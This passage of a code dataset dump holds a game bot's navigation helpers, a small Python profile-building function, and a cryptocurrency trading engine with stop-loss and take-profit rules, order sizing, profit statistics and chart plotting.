random.choice([random.uniform(7*math.pi/4, 2*math.pi), random.uniform(0, math.pi/4)])\n    elif hint == \"w\":\n        pt = random.uniform(5*math.pi/4, 3*math.pi/4)\n    else:\n        raise ValueError(\"Unknown loiter hint: \" + str(hint))\n\n    raw_loiter_point = (math.cos(pt), math.sin(pt))\n\n    if DEBUG & (DEBUG_NAV): logging.info(\"NAV - Ship {} raw_loiter_point: ({},{}), loiter_distance: {}, hint: {}\".format(ship.id, round(raw_loiter_point[0], 4), round(raw_loiter_point[1], 4), loiter_distance, hint))\n\n    loiterOffset = Position(round(raw_loiter_point[0] * loiter_distance), round(raw_loiter_point[1] * loiter_distance))\n\n    if DEBUG & (DEBUG_NAV_METRICS): game.game_metrics[\"raw_loiter_points\"].append(raw_loiter_point)\n    if DEBUG & (DEBUG_NAV_METRICS): game.game_metrics[\"loiter_offsets\"].append((loiterOffset.x, loiterOffset.y))\n\n    return ship.position + loiterOffset\n\n\ndef get_departure_point(game, dropoff, destination, departure_lanes = \"e-w\"):\n    distance = abs(destination - dropoff)\n\n    shortcut_x = True if distance.x >= (game.game_map.width / 2) else False\n    shortcut_y = True if distance.y >= (game.game_map.height / 2) else False\n\n#    logging.debug(\"shortcut_x: {}\".format(shortcut_x))\n#    logging.debug(\"shortcut_y: {}\".format(shortcut_y))\n\n    if departure_lanes == \"e-w\":\n        departure_distance = -DEPARTURE_DISTANCE if shortcut_x else DEPARTURE_DISTANCE\n        departure_x = dropoff.x + departure_distance if destination.x > dropoff.x else dropoff.x - departure_distance\n        departure_y = dropoff.y\n    elif departure_lanes == \"n-s\":\n        departure_distance = -DEPARTURE_DISTANCE if shortcut_y else DEPARTURE_DISTANCE\n        departure_x = dropoff.x\n        departure_y = dropoff.y + departure_distance if destination.y > dropoff.y else dropoff.y - departure_distance\n    else:\n        raise RuntimeError(\"Unknown departure_lanes: \" + str(departure_lanes))\n\n    return Position(departure_x, departure_y)","sub_path":"bots/v17/myutils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":22704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"73163382","text":"#build_profile\r\n\r\n#class for logical structuring on data being parsed into self.attributes\r\nclass profile(object):\r\n    #kwargs implementation for all keyword arguments given after firstName and lastName\r\n    def __init__(self, firstName, lastName, **kwargs):\r\n        self.attributes = {}\r\n        \r\n        self.firstName = firstName\r\n        self.attributes[\"first_name\"] = self.firstName\r\n        \r\n        self.lastName = lastName\r\n        self.attributes[\"last_name\"] = self.lastName\r\n        \r\n        for key, value in kwargs.items():\r\n            setattr(self, key, value)\r\n            self.attributes[key] = value\r\n\r\n    #getter and returner for self.attributes\r\n    def attributesGetter(self):\r\n        return self.attributes\r\n\r\n#instantiates a profile from the given data and returns its attributes dict\r\ndef build_profile(firstName, lastName, **kwargs):\r\n    
new_profile = profile(firstName, lastName, **kwargs)\r\n    return new_profile.attributesGetter()\r\n","sub_path":"buildprofile.py","file_name":"buildprofile.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"230621614","text":"#!/usr/bin/python\n\"\"\"Runtime environment engine\"\"\"\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as dts\nfrom matplotlib import gridspec\nimport mpl_finance as mpf\nimport pandas as pd\nimport talib\nfrom datetime import datetime, timedelta\nimport common.log as log\nimport utils.tools as ts\nimport utils.indicator as ic\nfrom setup import mongo_user, mongo_pwd, db_url\nimport common.xquant as xq\nimport db.mongodb as md\nfrom exchange.binanceExchange import BinanceExchange\nfrom exchange.okexExchange import OkexExchange\n\n\nclass Engine:\n    \"\"\"Engine\"\"\"\n\n    def __init__(self, instance_id, config, db_orders_name=None):\n        self.instance_id = instance_id\n        self.config = config\n\n        exchange = config[\"exchange\"]\n        if exchange == \"binance\":\n            self.kline_column_names = BinanceExchange.get_kline_column_names()\n        elif exchange == \"okex\":\n            self.kline_column_names = OkexExchange.get_kline_column_names()\n\n        self.md_db = md.MongoDB(mongo_user, mongo_pwd, exchange, db_url)\n        self.td_db = md.MongoDB(mongo_user, mongo_pwd, \"xquant\", db_url)\n\n        self.value = 100\n\n        if db_orders_name:\n            self.db_orders_name = db_orders_name\n            self.td_db.ensure_index(db_orders_name, [(\"instance_id\",1),(\"symbol\",1)])\n\n        self.can_open_time = None\n\n        self.tp_cc = {\"base_open\": 0}\n\n\n    def log_info(self, info):\n        log.info(info)\n\n    def log_warning(self, info):\n        log.warning(info)\n\n    def log_error(self, info):\n        log.error(info)\n\n    def log_critical(self, info):\n        log.critical(info)\n\n    def log_debug(self, info):\n        log.debug(info)\n\n    def get_kline_column_names(self):\n        return self.kline_column_names\n\n    def get_floating_profit(self, direction, amount, value, commission, cur_price):\n        if direction == xq.DIRECTION_LONG:\n            cycle_profit = cur_price * amount + value\n        else:\n            cycle_profit = value - cur_price * amount\n\n        cycle_profit -= commission\n\n        return cycle_profit\n\n    def _get_position(self, symbol, orders, cur_price):\n        target_coin, base_coin = xq.get_symbol_coins(symbol)\n\n        info = self._get_position_from_orders(symbol, orders)\n\n        total_profit = info[\"history_profit\"]\n        cycle_profit = 0  # stays 0 when there is no open position\n        if info[\"amount\"] > 0:\n            cycle_profit = self.get_floating_profit(info[\"direction\"], info[\"amount\"], info[\"value\"], info[\"commission\"], cur_price)\n            total_profit += cycle_profit\n\n        open_value = self.value\n        if self.config[\"mode\"] == 1:\n            open_value += info[\"history_profit\"]\n\n        info[\"floating_profit\"] = cycle_profit\n        info[\"floating_profit_rate\"] = cycle_profit / open_value\n\n        if orders:\n            info[\"pst_rate\"] = orders[-1][\"pst_rate\"]\n\n        self.log_info(\n            \"symbol( %s ); current price( %g ); position(%s%s%s history_profit: %g, history_commission: %g, history_profit_rate: %g, total_profit_rate: %g)\" % (\n                symbol,\n                cur_price,\n                \"amount: %f, price: %g, cost price: %g, value: %g, commission: %g, limit: %g, profit: %g,\"\n                % (\n                    info[\"amount\"],\n                    info[\"price\"],\n                    info[\"cost_price\"],\n                    info[\"value\"],\n                    info[\"commission\"],\n                    self.value,\n                    info[\"floating_profit\"],\n                )\n                if info[\"amount\"]\n                else \"\",\n                \" profit rate: %g,\"\n                % (info[\"floating_profit_rate\"])\n                if info[\"value\"]\n                else \"\",\n                \" start_time: %s\\n,\" % info[\"start_time\"].strftime(\"%Y-%m-%d 
%H:%M:%S\")\n if \"start_time\" in info and info[\"start_time\"]\n else \"\",\n info[\"history_profit\"],\n info[\"history_commission\"],\n (info[\"history_profit\"] / self.value),\n (total_profit / self.value)\n )\n )\n # print(info)\n return info\n\n def risk_control(self, position_info, cur_price):\n \"\"\" 风控 \"\"\"\n if position_info[\"amount\"] == 0:\n return []\n\n sl_signals = self.stop_loss(position_info, cur_price)\n tp_signals = self.take_profit(position_info, cur_price)\n return sl_signals + tp_signals\n\n def stop_loss(self, position_info, cur_price):\n \"\"\" 止损 \"\"\"\n sl_signals = []\n # 风控第一条:亏损金额超过额度的10%,如额度1000,亏损金额超过100即刻清仓\n limit_mode = self.config[\"mode\"]\n limit_value = self.value\n if limit_mode == 0:\n pass\n elif limit_mode == 1:\n limit_value += position_info[\"history_profit\"]\n else:\n self.log_error(\"请选择额度模式,默认是0\")\n\n sl_cfg = self.config[\"risk_control\"][\"stop_loss\"]\n sl_td_h = ts.get_next_open_timedelta(self.now())\n\n if \"base_value\" in sl_cfg and sl_cfg[\"base_value\"] > 0 and limit_value * sl_cfg[\"base_value\"] + position_info[\"floating_profit\"] <= 0:\n sl_signals.append(xq.create_signal(position_info[\"direction\"], xq.CLOSE_POSITION, 0, \" 止损\", \"亏损金额超过额度的{:8.2%}\".format(sl_cfg[\"base_value\"]), sl_td_h))\n\n # 风控第二条:当前价格低于持仓均价的90%,即刻清仓\n pst_price = position_info[\"price\"]\n if position_info[\"direction\"] == xq.DIRECTION_LONG:\n loss_rate = 1 - (cur_price / pst_price)\n else:\n loss_rate = (cur_price / pst_price) - 1\n if pst_price > 0 and \"base_price\" in sl_cfg and sl_cfg[\"base_price\"] > 0 and loss_rate >= sl_cfg[\"base_price\"]:\n sl_signals.append(xq.create_signal(position_info[\"direction\"], xq.CLOSE_POSITION, 0, \" 止损\", \"下跌了持仓均价的{:8.2%}\".format(sl_cfg[\"base_price\"]), sl_td_h))\n\n return sl_signals\n\n def take_profit(self, position_info, cur_price):\n \"\"\" 止盈 \"\"\"\n tp_signals = []\n\n if \"high\" not in position_info:\n return tp_cfg\n\n tp_cfg = self.config[\"risk_control\"][\"take_profit\"]\n\n if position_info[\"direction\"] == xq.DIRECTION_LONG:\n price_offset = position_info[\"high\"] - cur_price\n else:\n price_offset = cur_price - position_info[\"low\"]\n\n if \"base_open\" in tp_cfg:\n for bo_band in tp_cfg[\"base_open\"]:\n high_profit_rate = position_info[\"high\"] / position_info[\"price\"] - 1\n cur_profit_rate = cur_price / position_info[\"price\"] - 1\n fall_profit_rate = high_profit_rate - cur_profit_rate\n if high_profit_rate > bo_band[0]:\n self.log_info(\"base_open tp_cc 1 = %s\" % self.tp_cc[\"base_open\"])\n if fall_profit_rate >= bo_band[1]:\n self.tp_cc[\"base_open\"] += 1\n self.log_info(\"base_open tp_cc 2 = %s\" % self.tp_cc[\"base_open\"])\n if self.tp_cc[\"base_open\"] >= 1 :\n tp_signals.append(xq.create_signal(position_info[\"direction\"], xq.CLOSE_POSITION, 0, \" 止盈\", \"盈利回落(基于持仓价) fall rate:{:8.2%} ( {:8.2%}, {:8.2%} )\".format(fall_profit_rate, bo_band[0], bo_band[1])))\n else:\n self.tp_cc[\"base_open\"] = 0\n\n break\n\n if position_info[\"direction\"] == xq.DIRECTION_LONG:\n price_rate = cur_price / position_info[\"high\"]\n else:\n price_rate = position_info[\"low\"] / cur_price\n if \"base_high\" in tp_cfg and tp_cfg[\"base_high\"] > 0 and price_rate < (1 - tp_cfg[\"base_high\"]):\n tp_signals.append(xq.create_signal(position_info[\"direction\"], xq.CLOSE_POSITION, 0, \" 止盈\", \"盈利回落,基于最高价的{:8.2%}\".format(tp_cfg[\"base_high\"])))\n\n return tp_signals\n \"\"\"\n if position_info[\"amount\"] > 0:\n today_fall_rate = ts.cacl_today_fall_rate(klines, cur_price)\n if 
today_fall_rate > 0.1:\r\n            # liquidate\r\n            check_signals.append(\r\n                xq.create_signal(xq.SIDE_SELL, 0, \"close position: price fell 10% from today's high\")\r\n            )\r\n\r\n        period_start_time = position_info[\"start_time\"]\r\n        period_fall_rate = ts.cacl_period_fall_rate(\r\n            klines, period_start_time, cur_price\r\n        )\r\n        if period_fall_rate > 0.1:\r\n            # liquidate\r\n            check_signals.append(\r\n                xq.create_signal(xq.SIDE_SELL, 0, \"close position: price fell 10% from the period high\")\r\n            )\r\n        elif period_fall_rate > 0.05:\r\n            # halve the position\r\n            check_signals.append(\r\n                xq.create_signal(xq.SIDE_SELL, 0.5, \"reduce position: price fell 5% from the period high\")\r\n            )\r\n    \"\"\"\r\n\r\n    def handle_order(self, symbol, position_info, cur_price, check_signals):\r\n        \"\"\" Handle orders \"\"\"\r\n        rc_signals = self.risk_control(position_info, cur_price)\r\n        signals = rc_signals + check_signals\r\n        if not signals:\r\n            return\r\n        for signal in signals:\r\n            self.log_info(\"signal(%r)\" % signal[\"describe\"])\r\n\r\n        ds_signal = xq.decision_signals(signals)\r\n        self.log_info(\r\n            \"decision signal (%s %s), position rate(%g), describe(%s), can buy after(%s)\" % (\r\n                ds_signal[\"direction\"],\r\n                ds_signal[\"action\"],\r\n                ds_signal[\"pst_rate\"],\r\n                ds_signal[\"describe\"],\r\n                ds_signal[\"can_open_time\"]\r\n            )\r\n        )\r\n\r\n        if ds_signal[\"action\"] is None:\r\n            return\r\n\r\n        if self.can_open_time:\r\n            if self.now() < self.can_open_time:\r\n                # inside the restricted time window only closing is allowed, no opening\r\n                if ds_signal[\"action\"] != xq.CLOSE_POSITION:\r\n                    return\r\n            else:\r\n                # outside the window, reset the restriction\r\n                self.can_open_time = None\r\n\r\n        if ds_signal[\"can_open_time\"]:\r\n            if not self.can_open_time or (self.can_open_time and self.can_open_time < self.now() + ds_signal[\"can_open_time\"]):\r\n                self.can_open_time = self.now() + ds_signal[\"can_open_time\"]\r\n                self.log_info(\"can buy time: %s\" % self.can_open_time)\r\n\r\n        if ds_signal[\"pst_rate\"] > 1 or ds_signal[\"pst_rate\"] < 0:\r\n            self.log_warning(\"position rate (%g) out of range (0 ~ 1)\" % ds_signal[\"pst_rate\"])\r\n            return\r\n\r\n        limit_price_rate = self.config[\"limit_price_rate\"]\r\n        limit_mode = self.config[\"mode\"]\r\n        limit_value = self.value\r\n        if limit_mode == 0:\r\n            pass\r\n        elif limit_mode == 1:\r\n            limit_value += position_info[\"history_profit\"]\r\n        else:\r\n            self.log_error(\"please select a limit mode, the default is 0\")\r\n\r\n        target_coin, base_coin = xq.get_symbol_coins(symbol)\r\n\r\n        if ds_signal[\"action\"] == xq.OPEN_POSITION:\r\n            # open a position\r\n            if \"pst_rate\" in position_info and position_info[\"pst_rate\"] >= ds_signal[\"pst_rate\"]:\r\n                return\r\n\r\n            pst_cost = abs(position_info[\"value\"]) + position_info[\"commission\"]\r\n            base_amount = limit_value * ds_signal[\"pst_rate\"] - pst_cost\r\n            if base_amount <= 0:\r\n                return\r\n\r\n            if ds_signal[\"direction\"] == xq.DIRECTION_LONG:\r\n                # open long\r\n                base_balance = self.get_balances(base_coin)\r\n                self.log_info(\"base balance: %s\" % base_balance)\r\n                base_amount = min(xq.get_balance_free(base_balance), base_amount)\r\n                self.log_info(\"base_amount: %g\" % base_amount)\r\n                if base_amount <= 0: #\r\n                    return\r\n                target_amount = base_amount / (cur_price * (1 + self.config[\"commission_rate\"]))\r\n                rate = 1 + limit_price_rate[\"open\"]\r\n            else:\r\n                # open short\r\n                target_balance = self.get_balances(target_coin)\r\n                self.log_info(\"target balance: %s\" % target_balance)\r\n                target_amount = min(xq.get_balance_free(target_balance), base_amount / cur_price)\r\n                self.log_info(\"target_amount: %g\" % target_amount)\r\n                if target_amount <= 0: #\r\n                    return\r\n                rate = 1 - limit_price_rate[\"open\"]\r\n        else:\r\n            # close a position\r\n            if (not \"pst_rate\" in position_info) or position_info[\"pst_rate\"] <= ds_signal[\"pst_rate\"]:\r\n                return\r\n\r\n            target_amount = abs(position_info[\"amount\"]) * (position_info[\"pst_rate\"] - ds_signal[\"pst_rate\"]) / position_info[\"pst_rate\"]\r\n\r\n            if ds_signal[\"direction\"] == xq.DIRECTION_LONG:\r\n                
# close long\r\n                rate = 1 - limit_price_rate[\"close\"]\r\n            else:\r\n                # close short\r\n                rate = 1 + limit_price_rate[\"close\"]\r\n\r\n        target_amount = ts.reserve_float(target_amount, self.config[\"digits\"][target_coin])\r\n        self.log_info(\"%s %s target amount: %g\" % (ds_signal[\"direction\"], ds_signal[\"action\"], target_amount))\r\n        if target_amount <= 0:\r\n            return\r\n        limit_price = ts.reserve_float(cur_price * rate, self.config[\"digits\"][base_coin])\r\n        order_rmk = ds_signal[\"describe\"] + \": \" + ds_signal[\"rmk\"]\r\n        order_id = self.send_order_limit(\r\n            ds_signal[\"direction\"],\r\n            ds_signal[\"action\"],\r\n            symbol,\r\n            ds_signal[\"pst_rate\"],\r\n            cur_price,\r\n            limit_price,\r\n            target_amount,\r\n            \"%s, timedelta: %s, can buy after: %s\" % (order_rmk, ds_signal[\"can_open_time\"], self.can_open_time) if (ds_signal[\"can_open_time\"] or self.can_open_time) else \"%s\" % (order_rmk),\r\n        )\r\n        self.log_info(\r\n            \"current price: %g; rate: %g; order_id: %s\" % (cur_price, rate, order_id)\r\n        )\r\n\r\n    def check_order(self, order):\r\n        if order[\"direction\"] != xq.DIRECTION_LONG and order[\"direction\"] != xq.DIRECTION_SHORT:\r\n            self.log_error(\"invalid order direction\")\r\n            return False\r\n        if order[\"action\"] != xq.OPEN_POSITION and order[\"action\"] != xq.CLOSE_POSITION:\r\n            self.log_error(\"invalid order action\")\r\n            return False\r\n        return True\r\n\r\n    def get_order_value(self, order):\r\n        if (order[\"action\"] == xq.OPEN_POSITION and order[\"direction\"] == xq.DIRECTION_LONG) or (order[\"action\"] == xq.CLOSE_POSITION and order[\"direction\"] == xq.DIRECTION_SHORT):\r\n            return - order[\"deal_value\"]\r\n        else:\r\n            return order[\"deal_value\"]\r\n\r\n    def get_order_commission(self, order):\r\n        return order[\"deal_value\"] * self.config[\"commission_rate\"]\r\n\r\n    def _get_position_from_orders(self, symbol, orders):\r\n        cycle_first_order = None\r\n\r\n        history_profit = 0\r\n        history_commission = 0\r\n        cycle_amount = 0\r\n        cycle_value = 0\r\n        cycle_commission = 0\r\n        target_coin, base_coin = xq.get_symbol_coins(symbol)\r\n        for order in orders:\r\n            if not self.check_order(order):\r\n                return None\r\n\r\n            if order[\"action\"] == xq.OPEN_POSITION:\r\n                if cycle_amount == 0:\r\n                    cycle_first_order = order\r\n                cycle_amount += order[\"deal_amount\"]\r\n            else:\r\n                cycle_amount -= order[\"deal_amount\"]\r\n            cycle_amount = ts.reserve_float(cycle_amount, self.config[\"digits\"][target_coin])\r\n            cycle_value += self.get_order_value(order)\r\n            cycle_commission += self.get_order_commission(order)\r\n\r\n            if cycle_amount == 0:\r\n                history_profit += cycle_value - cycle_commission\r\n                history_commission += cycle_commission\r\n                cycle_value = 0\r\n                cycle_commission = 0\r\n\r\n        # position info\r\n        pst_info = {\r\n            \"amount\": cycle_amount, # quantity\r\n            \"value\": cycle_value, # value\r\n            \"commission\": cycle_commission, # commission\r\n            \"history_profit\": history_profit, # profit from closed cycles\r\n            \"history_commission\": history_commission, # commission from closed cycles\r\n        }\r\n\r\n        if cycle_amount > 0:\r\n            pst_info[\"price\"] = abs(cycle_value) / cycle_amount\r\n            pst_info[\"cost_price\"] = (abs(cycle_value) + cycle_commission) / cycle_amount\r\n\r\n            pst_info[\"direction\"] = cycle_first_order[\"direction\"]\r\n            pst_info[\"start_time\"] = datetime.fromtimestamp(cycle_first_order[\"create_time\"])\r\n            if \"high\" in cycle_first_order:\r\n                pst_info[\"high\"] = cycle_first_order[\"high\"]\r\n                pst_info[\"low\"] = cycle_first_order[\"low\"]\r\n\r\n        return pst_info\r\n\r\n\r\n    def stat_orders(self, symbol, orders):\r\n        cycle_id = 1\r\n\r\n        history_profit = 0\r\n        history_commission = 0\r\n        cycle_amount = 0\r\n        cycle_value = 0\r\n        cycle_commission = 0\r\n        target_coin, base_coin = xq.get_symbol_coins(symbol)\r\n        for order in orders:\r\n            if not self.check_order(order):\r\n                return None\r\n\r\n            order[\"cycle_id\"] = 
cycle_id\n\n if order[\"action\"] == xq.OPEN_POSITION:\n cycle_amount += order[\"deal_amount\"]\n else:\n cycle_amount -= order[\"deal_amount\"]\n cycle_amount = ts.reserve_float(cycle_amount, self.config[\"digits\"][target_coin])\n cycle_value += self.get_order_value(order)\n cycle_commission += self.get_order_commission(order)\n\n deal_price = order[\"deal_value\"] / order[\"deal_amount\"]\n cycle_profit = self.get_floating_profit(order[\"direction\"], cycle_amount, cycle_value, cycle_commission, deal_price)\n order[\"floating_profit\"] = cycle_profit\n order[\"history_profit\"] = history_profit\n order[\"total_profit\"] = cycle_profit + history_profit\n\n open_value = self.value\n if self.config[\"mode\"] == 1:\n open_value += history_profit\n order[\"floating_profit_rate\"] = order[\"floating_profit\"] / open_value\n order[\"history_profit_rate\"] = order[\"history_profit\"] / self.value\n order[\"total_profit_rate\"] = order[\"total_profit\"] / self.value\n\n if cycle_amount == 0:\n history_profit += cycle_profit\n history_commission += cycle_commission\n cycle_value = 0\n cycle_commission = 0\n cycle_id += 1\n\n return orders\n\n\n def analyze(self, symbol, orders):\n if len(orders) == 0:\n return\n\n orders = self.stat_orders(symbol, orders)\n\n print_switch_hl = True\n print_switch_deal = False\n print_switch_commission = False\n print_switch_profit = False\n\n title = \" id\"\n title += \" profit_rate\"\n title += \" create_time price\"\n\n if print_switch_hl:\n title += \" ( )\"\n title += \" pst_rate\"\n\n if print_switch_deal:\n title += \" deal_amount deal_value\"\n if print_switch_commission:\n title += \" total_commission\"\n if print_switch_profit:\n title += \" profit(total)\"\n title += \" rmk\"\n print(title)\n\n total_commission = 0\n for index ,order in enumerate(orders):\n commission = order[\"deal_value\"] * self.config[\"commission_rate\"]\n total_commission += commission\n\n order[\"trade_time\"] = datetime.fromtimestamp(order[\"create_time\"])\n\n info = \"%3d\" % (index)\n info += \" {:7.2%}({:8.2%})\".format(\n order[\"floating_profit_rate\"], order[\"total_profit_rate\"]\n )\n info += \" %s %10g\" % (\n datetime.fromtimestamp(order[\"create_time\"]),\n order[\"deal_value\"]/order[\"deal_amount\"],\n )\n\n if print_switch_hl:\n total_commission_rate = 0 # 2 * self.config[\"commission_rate\"]\n if \"high\" in order:\n deal_price = order[\"deal_value\"]/order[\"deal_amount\"]\n if order[\"direction\"] == xq.DIRECTION_LONG:\n tmp_profit_rate = order[\"high\"] / deal_price - 1 - total_commission_rate\n else:\n tmp_profit_rate = 1 - order[\"high\"] / deal_price - total_commission_rate\n\n info += \" ({:8.2%}\".format(tmp_profit_rate)\n info += \" %10g, %s)\" % (order[\"high\"], datetime.fromtimestamp(order[\"high_time\"]))\n else:\n pre_deal_price = pre_order[\"deal_value\"]/pre_order[\"deal_amount\"]\n if order[\"direction\"] == xq.DIRECTION_LONG:\n tmp_profit_rate = pre_order[\"low\"] / pre_deal_price - 1 - total_commission_rate\n else:\n tmp_profit_rate = 1 - pre_order[\"low\"] / pre_deal_price - total_commission_rate\n info += \" ({:8.2%}\".format(tmp_profit_rate)\n info += \" %10g, %s)\" % (pre_order[\"low\"], datetime.fromtimestamp(pre_order[\"low_time\"]))\n\n info += \" %s,%5s\" % (\n order[\"direction\"],\n order[\"action\"],\n )\n info += \" {:8.2f}\".format(order[\"pst_rate\"])\n\n if print_switch_deal:\n info += \" %11g %10g\" % (\n order[\"deal_amount\"],\n order[\"deal_value\"],\n )\n if print_switch_commission:\n info += \" %16g\" % (\n 
total_commission,\n                )\n            if print_switch_profit:\n                info += \" {:8.2f}({:9.2f})\".format(\n                    order[\"floating_profit\"],\n                    order[\"total_profit\"],\n                )\n            info += \" %s\" % (order[\"rmk\"])\n\n            pre_order = order\n            print(info)\n\n        orders_df = pd.DataFrame(orders)\n\n        orders_df[\"create_time\"] = orders_df[\"create_time\"].map(lambda x: datetime.fromtimestamp(x))\n        orders_df[\"deal_price\"] = orders_df[\"deal_value\"] / orders_df[\"deal_amount\"]\n        orders_df[\"commission\"] = orders_df[\"deal_value\"] * self.config[\"commission_rate\"]\n\n\n        orders_df[\"signal_id\"] = orders_df[\"rmk\"].map(lambda x: x.split(\": \")[0])\n        orders_df[\"signal_rmk\"] = orders_df[\"rmk\"].map(lambda x: x.split(\": \")[1])\n        del orders_df[\"order_id\"]\n        del orders_df[\"instance_id\"]\n        del orders_df[\"rmk\"]\n        #print(orders_df)\n        self.stat(\"total\", orders_df)\n\n        for signal_id in orders_df[\"signal_id\"].drop_duplicates().values:\n            #print(signal_id)\n\n            cycle_ids = orders_df[(orders_df[\"signal_id\"]==signal_id)][\"cycle_id\"]\n            #print(cycle_ids)\n\n            self.stat(signal_id, orders_df[(orders_df[\"cycle_id\"].isin(cycle_ids))])\n\n\n    def calc(self, symbol, orders):\n        if len(orders) <= 0:\n            return 0, 0, 0, 0\n        # stat_orders() annotates the orders with the profit columns used below\n        orders_df = pd.DataFrame(self.stat_orders(symbol, orders))\n        close_df = orders_df[(orders_df[\"action\"]==xq.CLOSE_POSITION)]\n\n        win_df = close_df[(close_df[\"floating_profit_rate\"] > 0)]\n        loss_df = close_df[(close_df[\"floating_profit_rate\"] < 0)]\n        win_count = len(win_df)\n        loss_count = len(loss_df)\n\n        total_profit_rate = close_df[\"floating_profit\"].sum() / self.value\n        sum_profit_rate = close_df[\"floating_profit_rate\"].sum()\n        return round(total_profit_rate, 4), round(sum_profit_rate, 4), win_count, loss_count\n\n\n    def stat(self, signal_id, orders_df):\n        print(\"\\n signal: \" + signal_id)\n        win_df = orders_df[(orders_df[\"action\"]==xq.CLOSE_POSITION) & (orders_df[\"floating_profit_rate\"] > 0)]\n        loss_df = orders_df[(orders_df[\"action\"]==xq.CLOSE_POSITION) & (orders_df[\"floating_profit_rate\"] < 0)]\n\n        win_count = len(win_df)\n        fail_count = len(loss_df)\n        if win_count > 0 or fail_count > 0:\n            win_rate = win_count / (win_count + fail_count)\n        else:\n            win_rate = 0\n        print(\"win count: %g, loss count: %g, win rate: %4.2f%%\" % (win_count, fail_count, round(win_rate*100, 2)))\n\n        w_profit_rates = win_df[\"floating_profit_rate\"]\n        l_profit_rates = loss_df[\"floating_profit_rate\"]\n        print(\"profit rate(total: %6.2f%%, max: %6.2f%%, min: %6.2f%%, average: %6.2f%%)\" % (round(w_profit_rates.sum()*100, 2), round(w_profit_rates.max()*100, 2), round(w_profit_rates.min()*100, 2), round(w_profit_rates.mean()*100, 2)))\n        print(\"loss rate(total: %6.2f%%, max: %6.2f%%, min: %6.2f%%, average: %6.2f%%)\" % (round(l_profit_rates.sum()*100, 2), round(l_profit_rates.min()*100, 2), round(l_profit_rates.max()*100, 2), round(l_profit_rates.mean()*100, 2)))\n\n        if fail_count > 0:\n            kelly = win_rate - (1-win_rate)/(w_profit_rates.mean()/abs(l_profit_rates.mean()))\n        else:\n            kelly = win_rate\n        print(\"Kelly Criterion: %.2f%%\" % round(kelly*100, 2))\n\n\n    def display(self, symbol, orders, klines):\n\n        \"\"\"\n        gs = gridspec.GridSpec(8, 1)\n        gs.update(left=0.04, bottom=0.04, right=1, top=1, wspace=0, hspace=0)\n        axes = [\n            plt.subplot(gs[0:-2, :]),\n            #plt.subplot(gs[-4:-2, :]),\n            plt.subplot(gs[-2:-1, :]),\n            plt.subplot(gs[-1, :])\n        ]\n        \"\"\"\n        fig, axes = plt.subplots(5, 1, sharex=True)\n        fig.subplots_adjust(left=0.04, bottom=0.04, right=1, top=1, wspace=0, hspace=0)\n\n        trade_times = [order[\"trade_time\"] for order in 
orders]\n\n        quotes = []\n        for k in klines:\n            d = datetime.fromtimestamp(k[0]/1000)\n            quote = (dts.date2num(d), float(k[1]), float(k[4]), float(k[2]), float(k[3]))\n            quotes.append(quote)\n\n        mpf.candlestick_ochl(axes[0], quotes, width=0.2, colorup='g', colordown='r')\n        axes[0].set_ylabel('price')\n        axes[0].grid(True)\n        axes[0].autoscale_view()\n        axes[0].xaxis_date()\n        axes[0].plot(trade_times, [(order[\"deal_value\"] / order[\"deal_amount\"]) for order in orders], \"o--\")\n\n        klines_df = pd.DataFrame(klines, columns=self.kline_column_names)\n        open_times = [datetime.fromtimestamp((open_time/1000)) for open_time in klines_df[\"open_time\"]]\n        # kline fields may arrive as strings; talib needs numeric arrays\n        klines_df[\"high\"] = pd.to_numeric(klines_df[\"high\"])\n        klines_df[\"low\"] = pd.to_numeric(klines_df[\"low\"])\n        klines_df[\"close\"] = pd.to_numeric(klines_df[\"close\"])\n        base_close = klines_df[\"close\"].values[0]\n\n        klines_df[\"ATR\"] = talib.ATR(klines_df[\"high\"], klines_df[\"low\"], klines_df[\"close\"], timeperiod=14)\n        klines_df[\"NATR\"] = talib.NATR(klines_df[\"high\"], klines_df[\"low\"], klines_df[\"close\"], timeperiod=14)\n        klines_df[\"TRANGE\"] = talib.TRANGE(klines_df[\"high\"], klines_df[\"low\"], klines_df[\"close\"])\n\n        # axes[0].plot(open_times, klines_df[\"ATR\"]*10, \"y:\", label=\"ATR\")\n\n        axes[1].set_ylabel('volatility')\n        axes[1].grid(True)\n        axes[1].plot(open_times, klines_df[\"ATR\"], \"y:\", label=\"ATR\")\n        axes[1].plot(open_times, klines_df[\"NATR\"], \"k--\", label=\"NATR\")\n        axes[1].plot(open_times, klines_df[\"TRANGE\"], \"c--\", label=\"TRANGE\")\n\n        ks, ds, js = ic.pd_kdj(klines_df)\n        axes[2].set_ylabel('kdj')\n        axes[2].grid(True)\n        axes[2].plot(open_times, ks, \"b\", label=\"k\")\n        axes[2].plot(open_times, ds, \"y\", label=\"d\")\n        axes[2].plot(open_times, js, \"m\", label=\"j\")\n\n        axes[-2].set_ylabel('total profit rate')\n        axes[-2].grid(True)\n        axes[-2].plot(trade_times, [round(100*order[\"total_profit_rate\"], 2) for order in orders], \"go--\")\n        axes[-2].plot(open_times, [round(100*((close/base_close)-1), 2) for close in klines_df[\"close\"]], \"r--\")\n\n        axes[-1].set_ylabel('rate')\n        axes[-1].grid(True)\n        #axes[-1].set_label([\"position rate\", \"profit rate\"])\n        axes[-1].plot(trade_times, [round(100*order[\"pst_rate\"], 2) for order in orders], \"k-\", drawstyle=\"steps-post\", label=\"position\")\n        axes[-1].plot(trade_times, [round(100*order[\"floating_profit_rate\"], 2) for order in orders], \"g--\", drawstyle=\"steps\", label=\"profit\")\n        \"\"\"\n        trade_times = []\n        pst_rates = []\n        for i, order in enumerate(orders):\n            # backfill the days between orders\n            if i > 0 and orders[i-1][\"pst_rate\"] > 0:\n                tmp_trade_date = orders[i-1][\"trade_time\"].date() + timedelta(days=1)\n                while tmp_trade_date < order[\"trade_time\"].date():\n                    trade_times.append(tmp_trade_date)\n                    pst_rates.append(orders[i-1][\"pst_rate\"])\n                    print(\"add %s, %s\" % (tmp_trade_date, orders[i-1][\"pst_rate\"]))\n                    tmp_trade_date += timedelta(days=1)\n\n            # append the order itself\n            trade_times.append(order[\"trade_time\"])\n            pst_rates.append(order[\"pst_rate\"])\n            print(\"%s, %s\" % (order[\"trade_time\"], order[\"pst_rate\"]))\n        plt.bar(trade_times, pst_rates, width=0.3)\n        \"\"\"\n\n        plt.show()\n\n
